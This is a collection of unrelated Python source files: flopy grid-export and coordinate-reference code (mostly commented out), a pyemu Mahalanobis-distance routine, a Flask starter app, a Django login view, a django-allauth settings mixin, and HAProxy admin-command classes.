# meta = {'count': a.shape[0],
# 'width': a.shape[2],
# 'height': a.shape[1],
# 'nodata': nodata,
# 'dtype': dtype,
# 'driver': 'GTiff',
# 'crs': self.proj4_str,
# 'transform': trans
# }
# meta.update(kwargs)
# with rasterio.open(filename, 'w', **meta) as dst:
# dst.write(a)
# print('wrote {}'.format(filename))
#
# elif filename.lower().endswith(".shp"):
# from ..export.shapefile_utils import write_grid_shapefile2
# epsg = kwargs.get('epsg', None)
# prj = kwargs.get('prj', None)
# if epsg is None and prj is None:
# epsg = self.epsg
# write_grid_shapefile2(filename, self, array_dict={fieldname: a},
# nan_val=nodata,
# epsg=epsg, prj=prj)
# def export_contours(self, filename, contours,
# fieldname='level', epsg=None, prj=None,
# **kwargs):
# """
# Convert matplotlib contour plot object to shapefile.
#
# Parameters
# ----------
# filename : str
# path of output shapefile
# contours : matplotlib.contour.QuadContourSet or list of them
# (object returned by matplotlib.pyplot.contour)
# epsg : int
# EPSG code. See https://www.epsg-registry.org/ or spatialreference.org
# prj : str
# Existing projection file to be used with new shapefile.
# **kwargs : key-word arguments to flopy.export.shapefile_utils.recarray2shp
#
# Returns
# -------
# df : dataframe of shapefile contents
#
# """
# from flopy.utils.geometry import LineString
# from flopy.export.shapefile_utils import recarray2shp
#
# if not isinstance(contours, list):
# contours = [contours]
#
# if epsg is None:
# epsg = self._epsg
# if prj is None:
# prj = self.proj4_str
#
# geoms = []
# level = []
# for ctr in contours:
# levels = ctr.levels
# for i, c in enumerate(ctr.collections):
# paths = c.get_paths()
# geoms += [LineString(p.vertices) for p in paths]
# level += list(np.ones(len(paths)) * levels[i])
#
# # convert the dictionary to a recarray
# ra = np.array(level,
# dtype=[(fieldname, float)]).view(np.recarray)
#
# recarray2shp(ra, geoms, filename, epsg=epsg, prj=prj, **kwargs)
#
# def export_array_contours(self, filename, a,
# fieldname='level',
# interval=None,
# levels=None,
# maxlevels=1000,
# epsg=None,
# prj=None,
# **kwargs):
# """
# Contour an array using matplotlib; write shapefile of contours.
#
# Parameters
# ----------
# filename : str
# Path of output file with '.shp' extension.
# a : 2D numpy array
# Array to contour
# epsg : int
# EPSG code. See https://www.epsg-registry.org/ or spatialreference.org
# prj : str
# Existing projection file to be used with new shapefile.
# **kwargs : key-word arguments to flopy.export.shapefile_utils.recarray2shp
#
# """
# import matplotlib.pyplot as plt
#
# if epsg is None:
# epsg = self._epsg
# if prj is None:
# prj = self.proj4_str
#
# if interval is not None:
# vmin = np.nanmin(a)
# vmax = np.nanmax(a)
# nlevels = np.round(np.abs(vmax - vmin) / interval, 2)
# msg = '{:.0f} levels '.format(nlevels) + \
# 'at interval of {} > '.format(interval) + \
# 'maxlevels = {}'.format(maxlevels)
# assert nlevels < maxlevels, msg
# levels = np.arange(vmin, vmax, interval)
# fig, ax = plt.subplots()
# ctr = self.contour_array(ax, a, levels=levels)
# self.export_contours(filename, ctr, fieldname, epsg, prj, **kwargs)
# plt.close()
#
# def contour_array(self, ax, a, **kwargs):
# """
# Create a QuadMesh plot of the specified array using pcolormesh
#
# Parameters
# ----------
# ax : matplotlib.axes.Axes
# ax to add the contours
#
# a : np.ndarray
# array to contour
#
# Returns
# -------
# contour_set : ContourSet
#
# """
# from flopy.plot import ModelMap
#
# kwargs['ax'] = ax
# mm = ModelMap(sr=self)
# contour_set = mm.contour_array(a=a, **kwargs)
#
# return contour_set
@property
def vertices(self):
"""
Returns a list of vertices for
"""
if self._vertices is None:
self._set_vertices()
return self._vertices
def _set_vertices(self):
"""
Populate vertices for the whole grid
"""
jj, ii = np.meshgrid(range(self.ncol), range(self.nrow))
jj, ii = jj.ravel(), ii.ravel()
self._vertices = self.get_vertices(ii, jj)
# def interpolate(self, a, xi, method='nearest'):
# """
# Use the griddata method to interpolate values from an array onto the
# points defined in xi. For any values outside of the grid, use
# 'nearest' to find a value for them.
#
# Parameters
# ----------
# a : numpy.ndarray
# array to interpolate from. It must be of size nrow, ncol
# xi : numpy.ndarray
# array containing x and y point coordinates of size (npts, 2). xi
# also works with broadcasting so that if a is a 2d array, then
# xi can be passed in as (xgrid, ygrid).
# method : {'linear', 'nearest', 'cubic'}
# method to use for interpolation (default is 'nearest')
#
# Returns
# -------
# b : numpy.ndarray
# array of size (npts)
#
# """
# try:
# from scipy.interpolate import griddata
# except:
# print('scipy not installed\ntry pip install scipy')
# return None
#
# # Create a 2d array of points for the grid centers
# points = np.empty((self.ncol * self.nrow, 2))
# points[:, 0] = self.xcentergrid.flatten()
# points[:, 1] = self.ycentergrid.flatten()
#
# # Use the griddata function to interpolate to the xi points
# b = griddata(points, a.flatten(), xi, method=method, fill_value=np.nan)
#
# # if method is linear or cubic, then replace nan's with a value
# # interpolated using nearest
# if method != 'nearest':
# bn = griddata(points, a.flatten(), xi, method='nearest')
# idx = np.isnan(b)
# b[idx] = bn[idx]
#
# return b
# def get_2d_vertex_connectivity(self):
# """
# Create the cell 2d vertices array and the iverts index array. These
# are the same form as the ones used to instantiate an unstructured
# spatial reference.
#
# Returns
# -------
#
# verts : ndarray
# array of x and y coordinates for the grid vertices
#
# iverts : list
# a list with a list of vertex indices for each cell in clockwise
# order starting with the upper left corner
#
# """
# x = self.xgrid.flatten()
# y = self.ygrid.flatten()
# nrowvert = self.nrow + 1
# ncolvert = self.ncol + 1
# npoints = nrowvert * ncolvert
# verts = np.empty((npoints, 2), dtype=np.float)
# verts[:, 0] = x
# verts[:, 1] = y
# iverts = []
# for i in range(self.nrow):
# for j in range(self.ncol):
# iv1 = i * ncolvert + j # upper left point number
# iv2 = iv1 + 1
# iv4 = (i + 1) * ncolvert + j
# iv3 = iv4 + 1
# iverts.append([iv1, iv2, iv3, iv4])
# return verts, iverts
# def get_3d_shared_vertex_connectivity(self, nlay, botm, ibound=None):
#
# # get the x and y points for the grid
# x = self.xgrid.flatten()
# y = self.ygrid.flatten()
#
# # set the size of the vertex grid
# nrowvert = self.nrow + 1
# ncolvert = self.ncol + 1
# nlayvert = nlay + 1
# nrvncv = nrowvert * ncolvert
# npoints = nrvncv * nlayvert
#
# # create and fill a 3d points array for the grid
# verts = np.empty((npoints, 3), dtype=np.float)
# verts[:, 0] = np.tile(x, nlayvert)
# verts[:, 1] = np.tile(y, nlayvert)
# istart = 0
# istop = nrvncv
# for k in range(nlay + 1):
# verts[istart:istop, 2] = self.interpolate(botm[k],
# verts[istart:istop, :2],
# method='linear')
# istart = istop
# istop = istart + nrvncv
#
# # create the list of points comprising each cell. points must be
# # listed a specific way according to vtk requirements.
# iverts = []
# for k in range(nlay):
# koffset = k * nrvncv
# for i in range(self.nrow):
# for j in range(self.ncol):
# if ibound is not None:
# if ibound[k, i, j] == 0:
# continue
# iv1 = i * ncolvert + j + koffset
# iv2 = iv1 + 1
# iv4 = (i + 1) * ncolvert + j + koffset
# iv3 = iv4 + 1
# iverts.append([iv4 + nrvncv, iv3 + nrvncv,
# iv1 + nrvncv, iv2 + nrvncv,
# iv4, iv3, iv1, iv2])
#
# # renumber and reduce the vertices if ibound_filter
# if ibound is not None:
#
# # go through the vertex list and mark vertices that are used
# ivertrenum = np.zeros(npoints, dtype=np.int)
# for vlist in iverts:
# for iv in vlist:
# # mark vertices that are actually used
# ivertrenum[iv] = 1
#
# # renumber vertices that are used, skip those that are not
# inum = 0
# for i in range(npoints):
# if ivertrenum[i] > 0:
# inum += 1
# ivertrenum[i] = inum
# ivertrenum -= 1
#
# # reassign the vertex list using the new vertex numbers
# iverts2 = []
# for vlist in iverts:
# vlist2 = []
# for iv in vlist:
# vlist2.append(ivertrenum[iv])
# iverts2.append(vlist2)
# iverts = iverts2
# idx = np.where(ivertrenum >= 0)
# verts = verts[idx]
#
# return verts, iverts
# def get_3d_vertex_connectivity(self, nlay, top, bot, ibound=None):
# if ibound is None:
# ncells = nlay * self.nrow * self.ncol
# ibound = np.ones((nlay, self.nrow, self.ncol), dtype=np.int)
# else:
# ncells = (ibound != 0).sum()
# npoints = ncells * 8
# verts = np.empty((npoints, 3), dtype=np.float)
# iverts = []
# ipoint = 0
# for k in range(nlay):
# for i in range(self.nrow):
# for j in range(self.ncol):
# if ibound[k, i, j] == 0:
# continue
#
# ivert = []
# pts = self.get_vertices(i, j)
# pt0, pt1, pt2, pt3, pt0 = pts
#
# z = bot[k, i, j]
#
# verts[ipoint, 0:2] = np.array(pt1)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt2)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt0)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt3)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# z = top[k, i, j]
#
# verts[ipoint, 0:2] = np.array(pt1)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt2)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt0)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# verts[ipoint, 0:2] = np.array(pt3)
# verts[ipoint, 2] = z
# ivert.append(ipoint)
# ipoint += 1
#
# iverts.append(ivert)
#
# return verts, iverts
# class EpsgRef:
# """
# Sets up a local database of text representations of coordinate reference
# systems, keyed by EPSG code.
#
# The database is epsgref.json, located in the user's data directory. If
# optional 'appdirs' package is available, this is in the platform-dependent
# user directory, otherwise in the user's 'HOME/.flopy' directory.
# """
#
# def __init__(self):
# try:
# from appdirs import user_data_dir
# except ImportError:
# user_data_dir = None
# if user_data_dir:
# datadir = user_data_dir('flopy')
# else:
# # if appdirs is not installed, use user's home directory
# datadir = os.path.join(os.path.expanduser('~'), '.flopy')
# if not os.path.isdir(datadir):
# os.makedirs(datadir)
# dbname = 'epsgref.json'
# self.location = os.path.join(datadir, dbname)
#
# def to_dict(self):
# """
# Returns dict with EPSG code integer key, and WKT CRS text
# """
# data = OrderedDict()
# if os.path.exists(self.location):
# with open(self.location, 'r') as f:
# loaded_data = json.load(f, object_pairs_hook=OrderedDict)
# # convert JSON key from str to EPSG integer
# for key, value in loaded_data.items():
# try:
# data[int(key)] = value
# except ValueError:
# data[key] = value
# return data
#
# def _write(self, data):
# with open(self.location, 'w') as f:
# json.dump(data, f, indent=0)
# f.write('\n')
#
# def reset(self, verbose=True):
# if os.path.exists(self.location):
# os.remove(self.location)
# if verbose:
# print('Resetting {}'.format(self.location))
#
# def add(self, epsg, prj):
# """
# add an epsg code to epsgref.json
# """
# data = self.to_dict()
# data[epsg] = prj
# self._write(data)
#
# def get(self, epsg):
# """
# returns prj from a epsg code, otherwise None if not found
# """
# data = self.to_dict()
# return data.get(epsg)
#
# def remove(self, epsg):
# """
# removes an epsg entry from epsgref.json
# """
# data = self.to_dict()
# if epsg in data:
# del data[epsg]
# self._write(data)
#
# @staticmethod
# def show():
# ep = EpsgRef()
# prj = ep.to_dict()
# for k, v in prj.items():
# print('{}:\n{}\n'.format(k, v))
# class CRS(object):
# """
# Container to parse and store coordinate reference system parameters,
# and translate between different formats.
# """
#
# def __init__(self, prj=None, esri_wkt=None, epsg=None):
# warnings.warn(
# "crs has been deprecated. Use CRS in shapefile_utils instead.",
# category=DeprecationWarning)
# self.wktstr = None
# if prj is not None:
# with open(prj) as fprj:
# self.wktstr = fprj.read()
# elif esri_wkt is not None:
# self.wktstr = esri_wkt
# elif epsg is not None:
# wktstr = getprj(epsg)
# if wktstr is not None:
# self.wktstr = wktstr
# if self.wktstr is not None:
# self.parse_wkt()
#
# @property
# def crs(self):
# """
# Dict mapping crs attributes to proj4 parameters
# """
# proj = None
# if self.projcs is not None:
# # projection
# if 'mercator' in self.projcs.lower():
# if 'transverse' in self.projcs.lower() or \
# 'tm' in self.projcs.lower():
# proj = 'tmerc'
# else:
# proj = 'merc'
# elif 'utm' in self.projcs.lower() and \
# 'zone' in self.projcs.lower():
# proj = 'utm'
# elif 'stateplane' in self.projcs.lower():
# proj = 'lcc'
# elif 'lambert' and 'conformal' and 'conic' in self.projcs.lower():
# proj = 'lcc'
# elif 'albers' in self.projcs.lower():
# proj = 'aea'
# elif self.projcs is None and self.geogcs is not None:
# proj = 'longlat'
#
# # datum
# datum = None
# if 'NAD' in self.datum.lower() or \
# 'north' in self.datum.lower() and \
# 'america' in self.datum.lower():
# datum = 'nad'
# if '83' in self.datum.lower():
# datum += '83'
# elif '27' in self.datum.lower():
# datum += '27'
# elif '84' in self.datum.lower():
# datum = 'wgs84'
#
# # ellipse
# ellps = None
# if '1866' in self.spheroid_name:
# ellps = 'clrk66'
# elif 'grs' in self.spheroid_name.lower():
# ellps = 'grs80'
# elif 'wgs' in self.spheroid_name.lower():
# ellps = 'wgs84'
#
# # prime meridian
# pm = self.primem[0].lower()
#
# return {'proj': proj,
# 'datum': datum,
# 'ellps': ellps,
# 'a': self.semi_major_axis,
# 'rf': self.inverse_flattening,
# 'lat_0': self.latitude_of_origin,
# 'lat_1': self.standard_parallel_1,
# 'lat_2': self.standard_parallel_2,
# 'lon_0': self.central_meridian,
# 'k_0': self.scale_factor,
# 'x_0': self.false_easting,
# 'y_0': self.false_northing,
# 'units': self.projcs_unit,
# 'zone': self.utm_zone}
#
# @property
# def grid_mapping_attribs(self):
# """
# Map parameters for CF Grid Mappings
# http://http://cfconventions.org/cf-conventions/cf-conventions.html,
# Appendix F: Grid Mappings
# """
# if self.wktstr is not None:
# sp = [p for p in [self.standard_parallel_1,
# self.standard_parallel_2]
# if p is not None]
# sp = sp if len(sp) > 0 else None
# proj = self.crs['proj']
# names = {'aea': 'albers_conical_equal_area',
# 'aeqd': 'azimuthal_equidistant',
# 'laea': 'lambert_azimuthal_equal_area',
# 'longlat': 'latitude_longitude',
# 'lcc': 'lambert_conformal_conic',
# 'merc': 'mercator',
# 'tmerc': 'transverse_mercator',
# 'utm': 'transverse_mercator'}
# attribs = {'grid_mapping_name': names[proj],
# 'semi_major_axis': self.crs['a'],
# 'inverse_flattening': self.crs['rf'],
# 'standard_parallel': sp,
# 'longitude_of_central_meridian': self.crs['lon_0'],
# 'latitude_of_projection_origin': self.crs['lat_0'],
# 'scale_factor_at_projection_origin': self.crs['k_0'],
# 'false_easting': self.crs['x_0'],
# 'false_northing': self.crs['y_0']}
# return {k: v for k, v in attribs.items() if v is not None}
#
# @property
# def proj4(self):
# """
# Not implemented yet
# """
# return None
#
# def parse_wkt(self):
#
# self.projcs = self._gettxt('PROJCS["', '"')
# self.utm_zone = None
# if self.projcs is not None and 'utm' in self.projcs.lower():
# self.utm_zone = self.projcs[-3:].lower().strip('n').strip('s')
# self.geogcs = self._gettxt('GEOGCS["', '"')
# self.datum = self._gettxt('DATUM["', '"')
# tmp = self._getgcsparam('SPHEROID')
# self.spheroid_name = tmp.pop(0)
# self.semi_major_axis = tmp.pop(0)
# self.inverse_flattening = tmp.pop(0)
# self.primem = self._getgcsparam('PRIMEM')
# self.gcs_unit = self._getgcsparam('UNIT')
# self.projection = self._gettxt('PROJECTION["', '"')
# self.latitude_of_origin = self._getvalue('latitude_of_origin')
# self.central_meridian = self._getvalue('central_meridian')
# self.standard_parallel_1 = self._getvalue('standard_parallel_1')
# self.standard_parallel_2 = self._getvalue('standard_parallel_2')
# self.scale_factor = self._getvalue('scale_factor')
# self.false_easting = self._getvalue('false_easting')
# self.false_northing = self._getvalue('false_northing')
# self.projcs_unit = self._getprojcs_unit()
#
# def _gettxt(self, s1, s2):
# s = self.wktstr.lower()
# strt = s.find(s1.lower())
# if strt >= 0: # -1 indicates not found
# strt += len(s1)
# end = s[strt:].find(s2.lower()) + strt
# return self.wktstr[strt:end]
#
# def _getvalue(self, k):
# s = self.wktstr.lower()
# strt = s.find(k.lower())
# if strt >= 0:
# strt += len(k)
# end = s[strt:].find(']') + strt
# try:
# return float(self.wktstr[strt:end].split(',')[1])
# except:
# print(' could not typecast wktstr to a float')
#
# def _getgcsparam(self, txt):
# nvalues = 3 if txt.lower() == 'spheroid' else 2
# tmp = self._gettxt('{}["'.format(txt), ']')
# if tmp is not None:
# tmp = tmp.replace('"', '').split(',')
# name = tmp[0:1]
# values = list(map(float, tmp[1:nvalues]))
# return name + values
# else:
# return [None] * nvalues
#
# def _getprojcs_unit(self):
# if self.projcs is not None:
# tmp = self.wktstr.lower().split('unit["')[-1]
# uname, ufactor = tmp.strip().strip(']').split('",')[0:2]
# ufactor = float(ufactor.split(']')[0].split()[0].split(',')[0])
# return uname, ufactor
# return None, None
# def getprj(epsg, addlocalreference=True, text='esriwkt'):
# """
# Gets projection file (.prj) text for given epsg code from
# spatialreference.org
#
# Parameters
# ----------
# epsg : int
# epsg code for coordinate system
# addlocalreference : boolean
# adds the projection file text associated with epsg to a local
# database, epsgref.json, located in the user's data directory.
#
# References
# ----------
# https://www.epsg-registry.org/
#
# Returns
# -------
# prj : str
# text for a projection (*.prj) file.
#
# """
# warnings.warn("SpatialReference has been deprecated. Use StructuredGrid "
# "instead.", category=DeprecationWarning)
# epsgfile = EpsgRef()
# wktstr = epsgfile.get(epsg)
# if wktstr is None:
# wktstr = get_spatialreference(epsg, text=text)
# if addlocalreference and wktstr is not None:
# epsgfile.add(epsg, wktstr)
# return wktstr
#
# def get_spatialreference(epsg, text='esriwkt'):
# """
# Gets text for given epsg code and text format from spatialreference.org
#
# Fetches the reference text using the url:
# https://spatialreference.org/ref/epsg/<epsg code>/<text>/
#
# See: https://www.epsg-registry.org/
#
# Parameters
# ----------
# epsg : int
# epsg code for coordinate system
# text : str
# string added to url
#
# Returns
# -------
# url : str
#
# """
# from flopy.utils.flopy_io import get_url_text
#
# warnings.warn("SpatialReference has been deprecated. Use StructuredGrid "
# "instead.", category=DeprecationWarning)
#
# epsg_categories = ['epsg', 'esri']
# for cat in epsg_categories:
# url = "{}/ref/{}/{}/{}/".format(srefhttp, cat, epsg, text)
# result = get_url_text(url)
# if result is not None:
# break
# if result is not None:
# return result.replace("\n", "")
# elif result is None and text != 'epsg':
# for cat in epsg_categories:
# error_msg = 'No internet connection or ' + \
# 'epsg code {} '.format(epsg) + \
# 'not found at {}/ref/'.format(srefhttp) + \
# '{}/{}/{}'.format(cat, cat, epsg)
# print(error_msg)
# # epsg code not listed on spatialreference.org
# # may still work with pyproj
# elif text == 'epsg':
# return '+init=epsg:{}'.format(epsg)
#
#
# def getproj4(epsg):
# """
# Get projection file (.prj) text for given epsg code from
# spatialreference.org. See: https://www.epsg-registry.org/
#
# Parameters
# ----------
# epsg : int
# epsg code for coordinate system
#
# Returns
# -------
# prj : str
# text for a projection (*.prj) file.
#
# """
# warnings.warn("SpatialReference has been deprecated. Use StructuredGrid "
# "instead.", category=DeprecationWarning)
#
# return get_spatialreference(epsg, text='proj4')
def get_maha_obs_summary(sim_en,l1_crit_val=6.34,l2_crit_val=9.2):
""" calculate the 1-D and 2-D mahalanobis distance
Args:
sim_en (`pyemu.ObservationEnsemble`): a simulated outputs ensemble
l1_crit_val (`float1): the chi squared critical value for the 1-D
mahalanobis distance. Default is 6.4 (p=0.01,df=1)
l2_crit_val (`float1): the chi squared critical value for the 2-D
mahalanobis distance. Default is 9.2 (p=0.01,df=2)
Returns:
tuple containing
- **pandas.DataFrame**: 1-D subspace squared mahalanobis distances
that exceed the `l1_crit_val` threshold
- **pandas.DataFrame**: 2-D subspace squared mahalanobis distances
that exceed the `l2_crit_val` threshold
Note:
Noise realizations are added to `sim_en` to account for measurement
noise.
"""
if not isinstance(sim_en,pyemu.ObservationEnsemble):
raise Exception("'sim_en' must be a "+\
" pyemu.ObservationEnsemble instance")
if sim_en.pst.nnz_obs < 1:
raise Exception(" at least one non-zero weighted obs is needed")
    # process the simulated ensemble to only have non-zero weighted obs
    obs = sim_en.pst.observation_data
    nz_names = sim_en.pst.nnz_obs_names
# get the full cov matrix
nz_cov_df = sim_en.covariance_matrix().to_dataframe()
nnz_en = sim_en.loc[:,nz_names].copy()
nz_cov_df = nz_cov_df.loc[nz_names,nz_names]
# get some noise realizations
nnz_en.reseed()
obsmean = obs.loc[nnz_en.columns.values, "obsval"]
noise_en = pyemu.ObservationEnsemble.from_gaussian_draw(sim_en.pst,num_reals=sim_en.shape[0])
noise_en -= obsmean #subtract off the obs val bc we just want the noise
noise_en.index = nnz_en.index
nnz_en += noise_en
#obsval_dict = obs.loc[nnz_en.columns.values,"obsval"].to_dict()
# first calculate the 1-D subspace maha distances
print("calculating L-1 maha distances")
sim_mean = nnz_en.mean()
obs_mean = obs.loc[nnz_en.columns.values,"obsval"]
simvar_inv = 1. / (nnz_en.std()**2)
res_mean = sim_mean - obs_mean
l1_maha_sq_df = res_mean**2 * simvar_inv
l1_maha_sq_df = l1_maha_sq_df.loc[l1_maha_sq_df > l1_crit_val]
# now calculate the 2-D subspace maha distances
print("preparing L-2 maha distance containers")
manager = mp.Manager()
ns = manager.Namespace()
results = manager.dict()
mean = manager.dict(res_mean.to_dict())
var = manager.dict()
cov = manager.dict()
var_arr = np.diag(nz_cov_df.values)
for i1, o1 in enumerate(nz_names):
var[o1] = var_arr[i1]
cov_vals = nz_cov_df.loc[o1, :].values[i1+1:]
ostr_vals = ["{0}_{1}".format(o1, o2) for o2 in nz_names[i1+1:]]
cd = {o:c for o,c in zip(ostr_vals,cov_vals)}
cov.update(cd)
print("starting L-2 maha distance parallel calcs")
#pool = mp.Pool(processes=5)
with mp.get_context("spawn").Pool() as pool:
for i1,o1 in enumerate(nz_names):
o2names = [o2 for o2 in nz_names[i1+1:]]
rresults = [pool.apply_async(_l2_maha_worker,args=(o1,o2names,mean,var,cov,results,l2_crit_val))]
[r.get() for r in rresults]
print("closing pool")
pool.close()
print("joining pool")
pool.join()
#print(results)
#print(len(results),len(ostr_vals))
keys = list(results.keys())
onames1 = [k.split('|')[0] for k in keys]
onames2 = [k.split('|')[1] for k in keys]
l2_maha_sq_vals = [results[k] for k in keys]
l2_maha_sq_df = pd.DataFrame({"obsnme_1":onames1,"obsnme_2":onames2,"sq_distance":l2_maha_sq_vals})
return l1_maha_sq_df,l2_maha_sq_df
def _l2_maha_worker(o1,o2names,mean,var,cov,results,l2_crit_val):
rresults = {}
v1 = var[o1]
c = np.zeros((2, 2))
c[0, 0] = v1
r1 = mean[o1]
for o2 in o2names:
ostr = "{0}_{1}".format(o1,o2)
cv = cov[ostr]
v2 = var[o2]
c[1,1] = v2
c[0,1] = cv
c[1,0] = cv
c_inv = np.linalg.inv(c)
r2 = mean[o2]
r_vec = np.array([r1, r2])
l2_maha_sq_val = np.dot(np.dot(r_vec, c_inv), r_vec.transpose())
if l2_maha_sq_val > l2_crit_val:
rresults[ostr] = l2_maha_sq_val
results.update(rresults)
print(o1,"done")
|
from flask import Flask
from flasgger import Swagger
from api.controller.strip import strip_api
def create_app():
app = Flask(__name__)
app.config['SWAGGER'] = {
'title': 'Flask API Starter Kit',
}
Swagger(app)
app.register_blueprint(strip_api, url_prefix='/api')
return app
if __name__ == '__main__':
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-p', '--port', default=3003, type=int, help='port to listen on')
args = parser.parse_args()
port = args.port
app = create_app()
app.run(host='0.0.0.0', port=port)
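# Illustrative usage (assumptions: the module is saved as app.py and the
# strip_api blueprint's routes live under the /api prefix registered above):
#
#     python app.py --port 3003
#     curl http://localhost:3003/apidocs/   # flasgger's interactive docs (default path)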
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from django.contrib import auth
from django.contrib.auth.hashers import check_password
from django.views import generic
from django.http import response
from django.utils.translation import ugettext as _
from django.core.urlresolvers import reverse
from models import Member
from forms import LoginForm
# Create your views here.
class LoginView(generic.TemplateView):
template_name = 'login.html'
def post(self, request, *args, **kwargs):
l_form = LoginForm(request.POST)
if l_form.is_valid():
email = l_form.cleaned_data['email']
password = l_form.cleaned_data['password']
try:
member = Member.objects.get(email=email)
if check_password(password, member.password):
auth.login(request, member)
ret = {
'code': 200,
'message': _('Login success.'),
'redirect': reverse('member_login')
}
return response.JsonResponse(ret)
else:
ret = {
'code': 403,
'message': _('Password error.')
}
return response.JsonResponse(ret)
except Member.DoesNotExist:
ret = {
'code': 404,
                    'message': _('Username does not exist.')
}
return response.JsonResponse(ret)
else:
context = {
'errors': l_form.errors
}
return render(request, 'login.html', context)
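# Illustrative sketch (the URL path below is hypothetical; it depends on how
# this view is wired into urls.py): the view returns JSON, so it can be
# exercised with Django's test client:
#
#     from django.test import Client
#     resp = Client().post('/member/login/', {'email': 'user@example.com',
#                                             'password': 'secret'})
#     resp.json()   # {'code': 200, 'message': 'Login success.', ...}
#                   # or the 403 / 404 payloads built above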
|
from typing import Type
from ._base import ComposedConfiguration, ConfigMixin
class AllauthMixin(ConfigMixin):
"""
Configure Django Allauth.
This requires the django-allauth package to be installed.
"""
@staticmethod
def mutate_configuration(configuration: Type[ComposedConfiguration]) -> None:
configuration.INSTALLED_APPS += [
'django.contrib.sites',
'allauth',
'allauth.account',
'allauth.socialaccount',
]
        # Insert before 'django.contrib.auth', so the overridden createsuperuser command is found first
auth_index = configuration.INSTALLED_APPS.index('django.contrib.auth')
configuration.INSTALLED_APPS.insert(
auth_index, 'composed_configuration._allauth_support.apps.AllauthSupportConfig'
)
# auth_style should come before others, to ensure its template overrides are found
configuration.INSTALLED_APPS.insert(0, 'auth_style')
# The sites framework requires this to be set.
# In the unlikely case where a database's pk sequence for the django_site table is not reset,
# the default site object could have a different pk. Then this will need to be overridden
# downstream.
SITE_ID = 1
AUTHENTICATION_BACKENDS = [
# Django's built-in ModelBackend is not necessary, since all users will be
# authenticated by their email address
'allauth.account.auth_backends.AuthenticationBackend',
]
# see configuration documentation at
# https://django-allauth.readthedocs.io/en/latest/configuration.html
# Require email verification, but this can be overridden
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
# Make Django and Allauth redirects consistent, but both may be overridden
LOGIN_REDIRECT_URL = '/'
ACCOUNT_LOGOUT_REDIRECT_URL = '/'
# Use email as the identifier for login
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = False
# Set the username as the email
ACCOUNT_ADAPTER = (
'composed_configuration._allauth_support.adapter.EmailAsUsernameAccountAdapter'
)
ACCOUNT_USER_MODEL_USERNAME_FIELD = None
# Quality of life improvements, but may not work if the browser is closed
ACCOUNT_SESSION_REMEMBER = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_LOGIN_ON_PASSWORD_RESET = True
# These will permit GET requests to mutate the user state, but significantly improve usability
ACCOUNT_LOGOUT_ON_GET = True
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
# This will likely become the default in the future, but enable it now
ACCOUNT_PRESERVE_USERNAME_CASING = False
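# Illustrative sketch (hypothetical project names): downstream settings compose
# this mixin by listing it ahead of ComposedConfiguration, which is expected to
# apply each mixin's settings and mutate_configuration hook:
#
#     class MySiteConfiguration(AllauthMixin, ComposedConfiguration):
#         WSGI_APPLICATION = 'mysite.wsgi.application'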
|
# pylint: disable=locally-disabled, too-few-public-methods, no-self-use, invalid-name
"""cmds.py - Implementations of the different HAProxy commands"""
import re
import csv
import json
from io import StringIO
class Cmd():
"""Cmd - Command base class"""
req_args = []
args = {}
cmdTxt = ""
helpTxt = ""
# pylint: disable=unused-argument
def __init__(self, *args, **kwargs):
"""Argument to the command are given in kwargs only. We ignore *args."""
self.args = kwargs
valid_kwargs = [k for (k, v) in kwargs.items() if v is not None]
if not all([a in valid_kwargs for a in self.req_args]):
raise Exception(f"Wrong number of arguments. Required arguments are: {self.WhatArgs()}")
def WhatArgs(self):
"""Returns a formatted string of arguments to this command."""
return ",".join(self.req_args)
@classmethod
def getHelp(cls):
"""Get formatted help string for this command."""
txtArgs = ",".join(cls.req_args)
if not txtArgs:
txtArgs = "None"
return " ".join((cls.helpTxt, "Arguments: %s" % txtArgs))
def getCmd(self):
"""Gets the command line for this command.
The default behavior is to apply the args dict to cmdTxt
"""
return self.cmdTxt % self.args
def getResult(self, res):
"""Returns raw results gathered from HAProxy"""
if res == '\n':
res = None
return res
def getResultObj(self, res):
"""Returns refined output from HAProxy, packed inside a Python obj i.e. a dict()"""
return res
class setServerAgent(Cmd):
"""Set server agent command."""
cmdTxt = "set server %(backend)s/%(server)s agent %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's agent to a new state."
class setServerHealth(Cmd):
"""Set server health command."""
cmdTxt = "set server %(backend)s/%(server)s health %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's health to a new state."
class setServerState(Cmd):
"""Set server state command."""
cmdTxt = "set server %(backend)s/%(server)s state %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's administrative state to a new state."
class setServerWeight(Cmd):
"""Set server weight command."""
cmdTxt = "set server %(backend)s/%(server)s weight %(value)s\r\n"
req_args = ['backend', 'server', 'value']
helpTxt = "Force a server's weight to a new state."
class showFBEnds(Cmd):
"""Base class for getting a listing Frontends and Backends"""
switch = ""
cmdTxt = "show stat\r\n"
def getResult(self, res):
return "\n".join(self._getResult(res))
def getResultObj(self, res):
return self._getResult(res)
def _getResult(self, res):
"""Show Frontend/Backends. To do this, we extract info from
the stat command and filter out by a specific
switch (FRONTEND/BACKEND)"""
if not self.switch:
raise Exception("No action specified")
result = []
lines = res.split('\n')
cl = re.compile("^[^,].+," + self.switch.upper() + ",.*$")
for e in lines:
me = re.match(cl, e)
if me:
result.append(e.split(",")[0])
return result
class showFrontends(showFBEnds):
"""Show frontends command."""
switch = "frontend"
